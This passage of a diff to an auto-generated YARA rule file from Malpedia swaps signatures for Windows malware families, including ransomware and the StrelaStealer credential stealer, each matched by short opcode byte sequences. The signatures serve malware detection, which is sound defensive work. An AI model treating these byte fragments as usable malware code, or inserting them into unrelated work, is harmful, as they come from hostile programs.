8b44240c 8b542404 83ec10 8d4c2400 53 50 } + $sequence_5 = { 83c408 3bf3 7420 8b4c2420 56 8b513c 52 } + $sequence_6 = { 72b5 eb1a 8b45fc 69c01c010000 03c6 81781000d00000 7506 } + $sequence_7 = { f3a4 8d4c246a 6800040000 51 6a00 ff15???????? } + $sequence_8 = { e8???????? eb73 bf???????? 83c9ff 33c0 f2ae f7d1 } + $sequence_9 = { 8b45fc 83481c10 8b45fc 89585c 8d45f4 } condition: - 7 of them and filesize <315392 + 7 of them and filesize <409600 } -rule MALPEDIA_Win_Scarabey_Auto : FILE +rule MALPEDIA_Win_Spaceship_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "32f7c136-d07c-5221-8524-163d31e0f9ce" + id = "b89dfb6c-e6cf-5987-bb83-c34e2134133d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scarabey_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spaceship_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "1ba8f19bbb29b54a80b4850f75f9b4dbbfff504fea1a8a75cc950df78ae9916b" + logic_hash = "411bed797a77bb254c4227872033ffc1c4978f634b16d7697bf043a78e35e5f7" score = 75 quality = 75 tags = "FILE" @@ -162357,32 +165149,32 @@ rule MALPEDIA_Win_Scarabey_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf0 85f6 7478 8b8dfcd6ffff 8b95f4d6ffff 8d85fcd6ffff 50 } - $sequence_1 = { e8???????? c745fcffffffff 8b06 8b7e04 2bf8 85c0 7409 } - $sequence_2 = { 51 52 ffd3 6a40 6800300000 } - $sequence_3 = { ff15???????? 56 ff15???????? a1???????? 33f6 56 } - $sequence_4 = { ba12000000 8d0dd0ad5700 e9???????? db2d???????? d9c9 d9f5 9b } - $sequence_5 = { 7d04 8944241c 686666aa00 50 33db 6a02 895c2450 } - $sequence_6 = { 8bc8 8b8524d7ffff 83c005 8d14c500000000 2bd0 a1???????? 03ca } - $sequence_7 = { e8???????? 8b4d08 8b83d40c0000 8bf0 83f907 7771 ff248d690c4700 } - $sequence_8 = { eb4c 8d4c2404 68???????? 51 e8???????? 83c408 84c0 } - $sequence_9 = { c744240808000000 c744240cff000000 ff15???????? 8bce e8???????? 6a00 e8???????? } + $sequence_0 = { 6689842464030000 6689842466030000 c784246803000028694100 66899c246c030000 668984246e030000 c784247003000018694100 } + $sequence_1 = { 66c78424a40400001200 66898424a6040000 c78424a804000070674100 66c78424ac0400001300 66898424ae040000 c78424b004000064674100 } + $sequence_2 = { 0f8415010000 bb01000000 3bfb 0f8cff000000 eb04 } + $sequence_3 = { 84c0 7547 eb31 8d7502 40 8a10 8aca } + $sequence_4 = { 52 e8???????? 83c418 5f 5e 5b 83c410 } + $sequence_5 = { 85c0 7454 8a442404 84c0 } + $sequence_6 = { 53 ff542428 8d8c2454020000 51 e8???????? } + $sequence_7 = { 8b442424 8b0d???????? 56 50 } + $sequence_8 = { 8d3c8d00ec4100 c1e603 8b0f 833c31ff } + $sequence_9 = { 723c 8d8c2458030000 6a00 8d94245c050000 51 52 ff15???????? } condition: - 7 of them and filesize <3580928 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Hellokitty_Auto : FILE +rule MALPEDIA_Win_Elirks_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "deb7a825-f579-50f4-a7a3-d6eebbf360da" + id = "abbbcbca-d514-5806-9c10-833d31c8983a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hellokitty_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.elirks_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "aa8f4a4903065b9814083d80e7b1fe6c3f259f31453cf2a2b84676c3d1765b58" + logic_hash = "4de38c5bbb938b8f52d51f635312140a804238195b0d5824203719bed438cd32" score = 75 quality = 75 tags = "FILE" @@ -162396,32 +165188,32 @@ rule MALPEDIA_Win_Hellokitty_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8975fc 8d4e08 c706???????? e8???????? 6818010000 8d86d0030000 6a00 } - $sequence_1 = { 23df 234df0 8bc7 c1c802 0bd9 33d0 03de } - $sequence_2 = { 7509 0fb64702 3a4604 7411 83c32c 41 83c72c } - $sequence_3 = { 33d2 8b45ec 8bf1 0fa4c11e c1ee02 0bd1 c1e01e } - $sequence_4 = { 8b048520364200 56 8b7508 57 8b4c0818 8b4514 832600 } - $sequence_5 = { 33ca 8bd1 894dec 8988a8000000 33d3 } - $sequence_6 = { 8b759c 03c2 8bd1 8945f8 8bc1 c1c807 c1c20e } - $sequence_7 = { 8b45c0 3175c4 8bf0 0facc81c c1e604 0bd0 c1e91c } - $sequence_8 = { 8bf8 83c020 59 f3a5 8b7508 83ee20 89450c } - $sequence_9 = { c1ce02 8b45d0 03cf 3345ec 3345c4 3345f0 8b7df4 } + $sequence_0 = { 8d4c2414 51 68???????? 8bf0 ff15???????? } + $sequence_1 = { 85c0 7417 8b44241c 01442414 03f0 2bf8 e9???????? } + $sequence_2 = { 51 8d44241c e8???????? 8b8e04600000 83c404 } + $sequence_3 = { 83c102 66c7012d00 83c102 66c7012d00 83c102 83ef03 83c603 } + $sequence_4 = { 68???????? 8d442430 e8???????? 83c40c } + $sequence_5 = { 7fe8 85ff 0f84a1010000 85ff 7e25 } + $sequence_6 = { c1f803 0faf4608 894614 6a68 } + $sequence_7 = { 52 ff15???????? 8bd8 83fbff 895c2410 7546 } + $sequence_8 = { 8d8c2490060000 51 6804010000 ff15???????? 8d9e0c600000 53 6a00 } + $sequence_9 = { 750b 57 e8???????? 83c404 5e c3 } condition: - 7 of them and filesize <319488 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Cryptomix_Auto : FILE +rule MALPEDIA_Win_Xbtl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9865a2c1-f352-5196-8a74-a585373e6231" + id = "7372571c-d52e-5b5b-bd42-81e7e356cc7e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptomix_auto.yar#L1-L173" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xbtl_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "2b59fc336b11257878a1c3e0c2e35ea57cb53b57126b62f006b040ede13bda6d" + logic_hash = "b45bdfe7ddb3c3bebb25f685acba4274921aebf8fbd081dea272d3bf592a2a7b" score = 75 quality = 75 tags = "FILE" @@ -162435,38 +165227,32 @@ rule MALPEDIA_Win_Cryptomix_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 68f0767c2a 6a04 e8???????? 59 59 } - $sequence_1 = { 02f8 0fb6cf 8d7601 0fb60439 8846ff 881439 33c9 } - $sequence_2 = { e8???????? 59 eb03 8b5df0 ff75f8 e8???????? } - $sequence_3 = { 7504 6a08 eb35 83f804 } - $sequence_4 = { ff4d08 8b4dfc 8ad8 75cc 5f } - $sequence_5 = { 59 59 ffd0 83f87a 7413 56 57 } - $sequence_6 = { 56 683f000f00 56 56 56 53 57 } - $sequence_7 = { ffd0 c3 686ea4ffa5 6a05 } - $sequence_8 = { ffd6 85c0 0f856a010000 68???????? 8d85c4f9ffff } - $sequence_9 = { 837d0c01 8bbdb8f9ffff a1???????? 68???????? } - $sequence_10 = { 68???????? 57 ffd0 ff75fc e8???????? } - $sequence_11 = { 8bf1 6a01 899584efffff 89b58cefffff 898588efffff ff15???????? 6808020000 } - $sequence_12 = { 8d85c4f9ffff 50 ffd7 85c0 7460 68???????? } - $sequence_13 = { 8b35???????? 68007d0000 6a40 c745f8e8030000 } - $sequence_14 = { 6a00 6a00 ff15???????? 6896000000 ff15???????? 8b9d80efffff 8d8598f9ffff } - $sequence_15 = { 68???????? 56 e8???????? 59 59 85c0 7759 } + $sequence_0 = { ffd7 50 ffd3 8bd8 85f6 7406 8d45e8 } + $sequence_1 = { 99 8bd8 8bc1 99 33f6 0bf0 3135???????? } + $sequence_2 = { 8d45ec 8d95f0fdffff e8???????? 8b85d4fdffff 56 56 6a03 } + $sequence_3 = { 85d2 782a 895dfc 8b4d08 0fb63c0a 8b460c 0345fc } + $sequence_4 = { 0fb67808 89948dc0feffff 0fb65007 c1e208 0bd7 } + $sequence_5 = { 83c41c 8d4c2410 51 ffd7 8b442434 8b4c2428 8b1d???????? } + $sequence_6 = { 8bd6 897c2420 2bd0 0fb708 66890c02 83c002 } + $sequence_7 = { 03048de0c04200 eb02 8bc2 f6402480 7417 e8???????? c70016000000 } + $sequence_8 = { 81e600ff00ff c1c208 81e2ff00ff00 0bf2 897018 8b491c } + $sequence_9 = { 8b5708 40 83c410 894704 3bc2 7e16 8d0412 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <401408 } -rule MALPEDIA_Win_Danbot_Auto : FILE +rule MALPEDIA_Win_Strelastealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2c585571-1377-525b-81df-f475b9f7d032" + id = "308b6312-f55e-5e44-8b26-8341d0a5504a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.danbot_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.strelastealer_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "7b636202f57d607cd3195402deda2493294df662e32f18cd69328119b0c63f1c" + logic_hash = "4a18fbcab2ec145e1ed1c3a8aa2118c83ff2631df0db61e9cbe03afa397c02a3" score = 75 quality = 75 tags = "FILE" @@ -162480,34 +165266,40 @@ rule MALPEDIA_Win_Danbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66893c48 448b4374 488b4b68 41ffc8 4d03c0 e8???????? 48638bac000000 } - $sequence_1 = { 8a4004 88040a 44016b28 8b5328 488b4330 488b4b10 8a4005 } - $sequence_2 = { 483bd7 7213 48ffc2 4c8bc3 488b8c2480030000 e8???????? 4c89b42490030000 } - $sequence_3 = { e9???????? 488b8a80000000 e9???????? 488b8a78000000 e9???????? 488b8a28000000 e9???????? } - $sequence_4 = { 4154 4155 4157 4881ec10060000 48c780a8fafffffeffffff 48895808 48897010 } - $sequence_5 = { 488b9424f0000000 4883fa10 7214 48ffc2 4d8bc4 488b8c24d8000000 e8???????? } - $sequence_6 = { 48ffc2 4d8bc6 488b8c2428010000 e8???????? 48899c2438010000 4889bc2440010000 889c2428010000 } - $sequence_7 = { 488b55df 4883fa08 7212 48ffc2 41b802000000 488b4dc7 e8???????? } - $sequence_8 = { 0fb6442420 84db 410f44c4 8ad8 895c2420 eb25 4c8b742460 } - $sequence_9 = { ffd3 99 33c2 2bc2 89442430 448be0 4c89642450 } + $sequence_0 = { 0f85e6030000 6804010000 8d942464010000 53 52 e8???????? } + $sequence_1 = { ff15???????? 8b442434 8b4c2438 53 } + $sequence_2 = { 488945f0 488d15d8a20000 b805000000 894520 } + $sequence_3 = { 885909 b801000000 83c404 51 0fb69220a30010 3011 33d2 } + $sequence_4 = { ff15???????? 33c9 8be8 85db 7612 8bc1 } + $sequence_5 = { 48895c2408 4889742410 57 4c8bd2 488d351b43ffff } + $sequence_6 = { 488d442478 33d2 4889442430 c744242801000000 4c897c2420 } + $sequence_7 = { 488d15eba10000 488d0dc4a10000 e8???????? 488d15e8a10000 488d0dd9a10000 } + $sequence_8 = { 0f85bc030000 8b442414 53 53 53 53 8d54244c } + $sequence_9 = { 740d 488bc8 49878cff20ac0100 eb0a 4d87b4ff20ac0100 33c0 } + $sequence_10 = { 4c8d05c7680100 c744243000020080 488d1548690100 48897c2428 4533c9 } + $sequence_11 = { 53 4883ec20 488d057f740000 488bd9 483bc8 7418 } + $sequence_12 = { 488d3de6070100 eb07 488d3dc5070100 4533ed } + $sequence_13 = { 51 6a00 6a00 6a1a 6a00 ff15???????? 68???????? } + $sequence_14 = { 51 8d94247c040000 52 ff15???????? } + $sequence_15 = { 8b4508 ff34c580b10010 ff15???????? 5d c3 6a0c } condition: - 7 of them and filesize <1492992 + 7 of them and filesize <266240 } -rule MALPEDIA_Win_Konni_Auto : FILE +rule MALPEDIA_Win_Purelocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7138d9e1-4213-5d32-a401-6f7ceedaf286" + id = "d1d522a1-058f-5ee5-85f2-56e8688f09bf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.konni_auto.yar#L1-L461" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.purelocker_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "81aa3927272d55dae2dfea8fc0fbd2614b2bb50237cc36185301dfe759c8d64e" + logic_hash = "42140169d70d3c64021f0eb71e13968d0cb2f62e4e2540159ee39f96b2cca71d" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -162519,72 +165311,32 @@ rule MALPEDIA_Win_Konni_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7908 4e 81ce00ffffff 46 8a9c35f8feffff 8819 889435f8feffff } - $sequence_1 = { 8945fc 53 56 57 b910000000 be???????? 8d7db0 } - $sequence_2 = { 7527 0fb655eb 0fb645ea 52 } - $sequence_3 = { 889435f8feffff 0fb609 0fb6d2 03ca 81e1ff000080 7908 } - $sequence_4 = { 0fbef1 d0f9 83e601 884c15f4 8970e8 42 } - $sequence_5 = { 49 81c900ffffff 41 8a940df8feffff 8d8c0df8feffff 0fb6da 03f3 } - $sequence_6 = { 83e601 897004 d0f9 0fbef1 83e601 8930 } - $sequence_7 = { 68b6030000 6a0d 50 ff15???????? } - $sequence_8 = { 6a01 ff15???????? 50 a3???????? } - $sequence_9 = { 33c9 83f802 7508 890d???????? } - $sequence_10 = { eb1e 83f804 740f c705????????02000000 } - $sequence_11 = { 740f c705????????02000000 83f801 750a c705????????01000000 890d???????? } - $sequence_12 = { 7508 890d???????? eb1e 83f804 } - $sequence_13 = { 8916 56 e8???????? 8a8c30dec44600 } - $sequence_14 = { e8???????? 83c40c 6804010000 8d8df4fdffff 51 ff15???????? } - $sequence_15 = { 83e203 83f908 7229 f3a5 ff2495f0444000 8bc7 } - $sequence_16 = { 8d85f8feffff 50 ffd6 68???????? 8d8df0faffff } - $sequence_17 = { 4c89742420 ff15???????? 488bd8 4885c0 744f } - $sequence_18 = { bbedffffff 03dd 81eb00200200 83bd9404000000 899d94040000 0f85d7030000 } - $sequence_19 = { e9???????? 8b35???????? 68???????? 8d85f8feffff } - $sequence_20 = { ff95b50f0000 898598040000 8bf0 8d7d51 } - $sequence_21 = { 6804010000 8d95f8feffff 52 50 ff15???????? } - $sequence_22 = { 50 038594040000 59 0bc9 89851a040000 61 7508 } - $sequence_23 = { 8b4e08 33db 56 e8???????? 8a9c30c2c44600 } - $sequence_24 = { 8bf0 8d7d51 57 56 ff95b10f0000 ab } - $sequence_25 = { 33d2 56 e8???????? 8a9435dec44600 5e 84c0 8bfa } - $sequence_26 = { 56 33d2 898ddcfeffff 40 57 } - $sequence_27 = { 6808020000 6a00 56 c745fc00010000 e8???????? 83c40c 8d45fc } - $sequence_28 = { ebab c745e428614000 817de42c614000 7311 8b45e4 } - $sequence_29 = { 6a00 6a00 8d8df8feffff 51 8d95f0fcffff } - $sequence_30 = { 68???????? 8d8df0faffff 51 ffd6 8b35???????? } - $sequence_31 = { 51 6689442414 e8???????? 6808020000 8d942420020000 6a00 } - $sequence_32 = { e8???????? 8a8c30a6c44600 5e 8b442414 03ca 03c1 89442414 } - $sequence_33 = { 33c0 56 51 668985e8fdffff e8???????? } - $sequence_34 = { 488bda 488b15???????? 4889442458 89442450 488b05???????? 482bc2 } - $sequence_35 = { 48ffc9 48ffc1 7440 488d542448 458d4e2e } - $sequence_36 = { 8bd9 e8???????? 4885c0 7509 488d051f390100 } - $sequence_37 = { 4883ec20 488bd9 e8???????? 4c8d1d4b9b0000 } - $sequence_38 = { 488b01 8b08 ff15???????? 488d15f3170100 488bcb } - $sequence_39 = { e8???????? 59 3bc7 59 a3???????? 7419 68???????? } - $sequence_40 = { 743e 8305????????20 8d0c9de0a30010 8d9080040000 8901 3bc2 } - $sequence_41 = { 4885c0 7438 33c0 4883c9ff 4c8d8600010000 488bfb } - $sequence_42 = { 8d04c0 8b0c8de0a30010 8a448104 83e040 c3 55 8bec } - $sequence_43 = { 83c410 837dfc08 752f 68???????? 53 e8???????? } - $sequence_44 = { 448d5bf0 498d4e10 4963d3 4d8bcd 4d8bc4 } - $sequence_45 = { 8b8fa8af0100 488b87a0af0100 400fb6d6 f6d2 881401 ff87a8af0100 8b97a8af0100 } - $sequence_46 = { 59 8a4dff 8d3c85e0a30010 8bc3 80c901 83e01f 884d0b } - $sequence_47 = { 488905???????? 8905???????? 488b05???????? 4533c0 48c7c102000080 488905???????? } - $sequence_48 = { 8bc3 c1f905 83e01f 8b0c8de0a30010 8d04c0 } - $sequence_49 = { 8b442448 448b6e4c 448b7e44 c1e808 4c8bf3 8b5e48 } + $sequence_0 = { c7042400000000 8d442434 50 8d842440040000 50 8d842440020000 } + $sequence_1 = { c1e908 81e1ff000000 331c85201c0110 8b442414 8b148d20180110 335f08 } + $sequence_2 = { 8b442410 0fb6c0 330c8520300110 8bc6 } + $sequence_3 = { 6a00 85c9 59 751a 8bda 53 } + $sequence_4 = { 53 ba17000000 83ec04 c7042400000000 4a 75f3 e8???????? } + $sequence_5 = { 8d1524400110 59 e8???????? 741e 8b542468 52 } + $sequence_6 = { 50 31c0 50 8b15???????? 52 e8???????? 5a } + $sequence_7 = { e8???????? 8d1524400110 8d0d285e0110 e8???????? 8d1524400110 8d0d845d0110 } + $sequence_8 = { e8???????? e8???????? 011424 e8???????? 58 8b542408 52 } + $sequence_9 = { 50 680a000000 ff742418 e8???????? e8???????? 52 e8???????? } condition: - 7 of them and filesize <330752 + 7 of them and filesize <193536 } -rule MALPEDIA_Win_Woolger_Auto : FILE +rule MALPEDIA_Win_Parasite_Http_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "903b676c-1246-53ac-bdc3-0b77fc0dda3c" + id = "8396c4fe-e904-583d-8bc2-2a1b61b79bee" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.woolger_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.parasite_http_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "403d441c2bcd327a0a5f26d737426637c32fb82ed6205c2fd16dc75ea4a861d4" + logic_hash = "37851542b45d72ed626359d2a060741c909807319056a1d140e5557e76485a87" score = 75 quality = 75 tags = "FILE" @@ -162598,34 +165350,34 @@ rule MALPEDIA_Win_Woolger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83f814 750a be???????? e9???????? 83f81b } - $sequence_1 = { 83ec54 6a40 8d45b0 6a00 50 c745ac44000000 e8???????? } - $sequence_2 = { 33c5 8945fc 33c0 668945d4 } - $sequence_3 = { 6685c0 8d85fcfeffff 50 0f95c3 ff15???????? 8b4f08 } - $sequence_4 = { 52 ff15???????? 83f801 0f858d000000 } - $sequence_5 = { 6a00 68???????? ff15???????? 68???????? 6a01 6a00 } - $sequence_6 = { 66a5 8dbdfcf8ffff 4f 8a4701 47 84c0 } - $sequence_7 = { 6a00 8d8dd4f4ffff 51 ffd6 85c0 75db } - $sequence_8 = { 83c414 81ffb80b0000 5f 7c40 e8???????? e8???????? } - $sequence_9 = { 3da2000000 0f8403010000 3da3000000 0f84f8000000 3da4000000 0f84e6000000 3da5000000 } + $sequence_0 = { 57 b900040000 e8???????? 8bf8 85ff 0f848a000000 56 } + $sequence_1 = { 50 33c0 895dfc 53 53 } + $sequence_2 = { 884df2 8d4dbc 66895dbe 668955c0 66895dc4 668945ce 66c745ec5669 } + $sequence_3 = { e8???????? 59 85db 7407 8bcb e8???????? 8b45f0 } + $sequence_4 = { 6a36 6689460a 58 6a34 6689460e 58 57 } + $sequence_5 = { e8???????? b9???????? 8bd8 e8???????? 33d2 8bcb } + $sequence_6 = { 57 8bf9 b9???????? e8???????? b9???????? 8bf0 e8???????? } + $sequence_7 = { 57 e8???????? 03c6 50 52 } + $sequence_8 = { 740f 8d4dfc 51 51 51 50 } + $sequence_9 = { 53 ffd0 8bcf e8???????? 8bce e8???????? 8bcb } condition: - 7 of them and filesize <196608 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Sepsys_Auto : FILE +rule MALPEDIA_Win_Batel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d155b3c0-24fe-546c-9cf6-d2f1eeec70b2" + id = "5c784793-7499-59d2-9d6e-e8d3b0a588c6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sepsys_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.batel_auto.yar#L1-L228" license_url = "N/A" - logic_hash = "89f35a98ab7f5302d816a97393fda02a0779a3eb472a7bbe6cda60406ec5b6de" + logic_hash = "54d1d1c2accc87182d1d618459ab2c69708bc7f726841a04281db6bdb06903a0" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -162637,32 +165389,45 @@ rule MALPEDIA_Win_Sepsys_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb00 c685b500000000 488b4df8 488b55e8 4c8b45f0 e8???????? 488955e0 } - $sequence_1 = { eb13 488b442448 4839442450 7407 b837000000 eb0e 488d4c2460 } - $sequence_2 = { e9???????? 0fb74b02 81f9e8030000 7338 41b801000000 6683f90a 723f } - $sequence_3 = { c685b604000000 488d8da0000000 e8???????? ebd8 488b4508 488d4d20 48894da8 } - $sequence_4 = { e8???????? 41b801000000 488d9424a0000000 488d8c24d8000000 e8???????? 488b442460 488b4008 } - $sequence_5 = { e8???????? 4889442430 488b442430 4889442450 488b542450 488b4c2438 e8???????? } - $sequence_6 = { 488b842400010000 4889842400020000 8b8c24c8010000 338c24f8010000 8b9424cc010000 339424fc010000 448b8424d0010000 } - $sequence_7 = { e8???????? 488945b0 eb00 488b45b0 48898518010000 eb0b 488b45b8 } - $sequence_8 = { d3e0 488b4c2430 89411c 4533c0 33d2 33c9 e8???????? } - $sequence_9 = { e8???????? 488b4c2430 ff15???????? 33d2 488d8c2460010000 e8???????? 4889442430 } + $sequence_0 = { 33c0 5b c21000 3b0d???????? 7502 f3c3 } + $sequence_1 = { 56 b858212300 be58212300 57 8bf8 3bc6 } + $sequence_2 = { 7429 68f4202300 56 ff15???????? } + $sequence_3 = { 7cec 56 57 6a40 6800100000 } + $sequence_4 = { 7ccd 5f 5e 5d 33c0 5b c21000 } + $sequence_5 = { c745fc00000000 6800002300 e8???????? 83c404 } + $sequence_6 = { 689d020000 8d8561fdffff 6a00 50 c68560fdffff00 } + $sequence_7 = { 8b1d???????? bf01000000 8d642400 68???????? ff15???????? } + $sequence_8 = { b8???????? 8a10 88940d60fdffff 83c003 } + $sequence_9 = { a1???????? 85c0 752c 8935???????? 68d0202300 } + $sequence_10 = { 40 c20c00 55 8bec 81eca0020000 68ee020000 ff15???????? } + $sequence_11 = { b90b010000 66398818002300 75dd 83b8740023000e 76d4 } + $sequence_12 = { ffd3 68005c2605 ffd5 47 83ff5a 7ccd 5f } + $sequence_13 = { 55 8b2d???????? 56 57 68a00f0000 ffd5 } + $sequence_14 = { 85c0 7412 ffd0 56 } + $sequence_15 = { 59 6a00 ff15???????? 68d8202300 ff15???????? 833d????????00 } + $sequence_16 = { 68a00f0000 ffd5 8b1d???????? bf01000000 } + $sequence_17 = { 50 c68560fdffff00 e8???????? 83c40c 33c9 } + $sequence_18 = { 85f6 7422 68???????? 56 ff15???????? 85c0 7412 } + $sequence_19 = { 6a00 ff15???????? 8bf8 b9a7000000 8db560fdffff f3a5 66a5 } + $sequence_20 = { 6a40 6800100000 689e020000 6a00 ff15???????? } + $sequence_21 = { 83b8740023000e 76d4 33c9 3988e8002300 0f95c1 8bc1 6a02 } + $sequence_22 = { 66a5 ffd0 5f 5e } condition: - 7 of them and filesize <4538368 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Cheesetray_Auto : FILE +rule MALPEDIA_Win_Buzus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eb62b85d-8cb5-5c93-9081-d14aeb9fbc65" + id = "abeb46d7-6b5d-534d-9d29-46b219047b43" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cheesetray_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buzus_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "191172cf0a118bdd8e29d678be92e505a1f63a7f2bef651373f2b7d4a4b3676d" + logic_hash = "4ce965d715abb7623aae188d8dd7527d9c7207cb501cc27ac457187efef652e0" score = 75 quality = 75 tags = "FILE" @@ -162676,34 +165441,34 @@ rule MALPEDIA_Win_Cheesetray_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66898424c4000000 e8???????? 8b4d08 83c40c 51 8d54240c 33c0 } - $sequence_1 = { c20c00 397368 740e 56 e8???????? 83c404 83f8ff } - $sequence_2 = { 03cf 8988bc160000 8b3cb5f0234400 8b5d08 85ff 0f8487fdffff 2b14b5282d4400 } - $sequence_3 = { 8bf8 85ff 745d 0fb755f0 8b45ec 52 50 } - $sequence_4 = { e8???????? 8b442434 3bc7 7403 50 ffd6 } - $sequence_5 = { 8d0c00 8d442428 50 52 e8???????? 83c408 894608 } - $sequence_6 = { 8bda c1eb18 33049da02d4400 81e2ff000000 330495a0394400 83c120 3341f8 } - $sequence_7 = { 8b4dfc 5f 5e a3???????? 890d???????? b801000000 5b } - $sequence_8 = { e8???????? 8b45f8 83c40c 53 53 8d4dec 51 } - $sequence_9 = { 83c410 33c0 5f 66398500ffffff 740c 40 6683bc4500ffffff00 } + $sequence_0 = { 5d 7413 68???????? 50 ffd6 3bc3 a3???????? } + $sequence_1 = { 4e 46 897508 ebbd 803e2a 750b 83f801 } + $sequence_2 = { ff75c0 ff75bc 50 e8???????? 83c40c 83f801 0f85e4000000 } + $sequence_3 = { e8???????? 8d8554fdffff 50 8d85ccfdffff 50 68???????? } + $sequence_4 = { 68???????? 6a01 56 68???????? 33ff 8975f0 8975f4 } + $sequence_5 = { 50 ff15???????? be???????? 8d84242c280000 } + $sequence_6 = { 898524ffffff 8b45bc 89850cffffff 8b45d8 898514ffffff 6bc03c 6a31 } + $sequence_7 = { 385802 750e 0fbe5001 c68415b0feffff01 eb28 80fa2d 7539 } + $sequence_8 = { 6a03 58 8945b8 6a3c 59 3bc1 7603 } + $sequence_9 = { 68???????? 50 ff7508 e8???????? 83c41c 8b45d4 68b80b0000 } condition: - 7 of them and filesize <8626176 + 7 of them and filesize <679936 } -rule MALPEDIA_Win_Ragnarlocker_Auto : FILE +rule MALPEDIA_Win_Vobfus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at 